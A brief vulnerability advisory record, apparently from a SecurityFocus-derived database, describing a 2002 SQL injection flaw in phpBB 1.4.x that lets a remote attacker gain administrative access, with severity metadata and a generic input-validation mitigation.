vendor: phpBB
by: SecurityFocus
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: phpBB
Affected Version From: phpBB 1.4.x
Affected Version To: phpBB 1.4.x
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:phpbb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002
phpBB Remote SQL Injection Vulnerability
An issue exists in phpBB that allows a remote attacker to manipulate SQL queries and thereby gain an administrative account with the service. The problem is due to improper validation of user-supplied input in certain phpBB variables. It can be exploited with a crafted web request that contains arbitrary user-supplied replacement values. One consequence of successful exploitation is that the attacker will be privy to user information.
Mitigation:
Ensure that user-supplied input is properly validated and sanitized before being used in SQL queries.